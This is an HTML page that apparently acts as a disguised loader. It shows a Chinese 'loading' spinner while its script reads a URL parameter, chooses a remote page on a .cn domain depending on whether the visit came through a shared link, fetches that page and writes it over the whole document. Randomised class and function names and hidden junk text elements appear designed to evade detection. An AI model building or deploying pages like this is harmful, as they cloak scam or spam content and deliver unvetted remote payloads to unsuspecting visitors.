<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .FxeZiKMmbHr {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .FxeZiKMmbHr .mtbEB4K {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .FxeZiKMmbHr .content {
            line-height: 50px;
            text-align: center
        }

        .FxeZiKMmbHr .img {
            width: 100%
        }

        .FxeZiKMmbHr .pQHtYXIFLtC {
            text-align: center
        }

        .FxeZiKMmbHr .pQHtYXIFLtC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .FxeZiKMmbHr .pQHtYXIFLtC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .FxeZiKMmbHr .pQHtYXIFLtC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .FxeZiKMmbHr .pQHtYXIFLtC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .FxeZiKMmbHr .pQHtYXIFLtC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .FxeZiKMmbHr .pQHtYXIFLtC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .FxeZiKMmbHr .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function diAbEHMEIFHZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NI81teA = diAbEHMEIFHZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NI81teA +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NI81teA +".html?a=share";
		}
		
        dGCUSQ8wf=url+"#"+new Date().getTime();
        dGCUSQ8wf && function() {
            $.get(dGCUSQ8wf, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>JPyfnvI4OU7wmuQlYmJyMbKKHWHFYZ1TV8RgO</div>
<h1 style='display:none' >AxS35lqVcjJEHDfFhWU</h1>
<span style='display:none'>XjPYrKCjufb5ZEVH</span><div class="FxeZiKMmbHr">
    <div class="mtbEB4K">
        <div class="pQHtYXIFLtC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >OXZnqumET2JCVApMHJiS2FSjl7G</b>
<ul style='display:none' >rHBQqoLT3DPWhwH66</ul>
<li style='display:none' >Hx0WARxXXfAcaFDzb7SKw5ObSIetIQ14NywiWTcIdeAeiOdHFkoa5reMnYKMiVn</li>
<ul style='display:none' >rHBQqoLT3DPWhwH66</ul>
<img  src='' style='display:none'>
<h1 style='display:none' >FldV89xJPRIaCrAvzlZfoVPAX4AiEaa3aRqIz4phmHUfraKdY97oG</h1>
<div style='display:none'>eFxCjqYHrDwbYH96Ejh1dwldoeJYcHtgeVdOr5FMchDUvyxcIM8jwdpLSVSaGaV7YIbGi</div>
<li style='display:none' >Hx0WARxXXfAcaFDzb7SKw5ObSIetIQ14NywiWTcIdeAeiOdHFkoa5reMnYKMiVn</li>
<h1 style='display:none' >FldV89xJPRIaCrAvzlZfoVPAX4AiEaa3aRqIz4phmHUfraKdY97oG</h1>
<a  href='#' style='display:none'>QCLGz69VcTOH6E4Kw5lkGKf</a></body>
</html>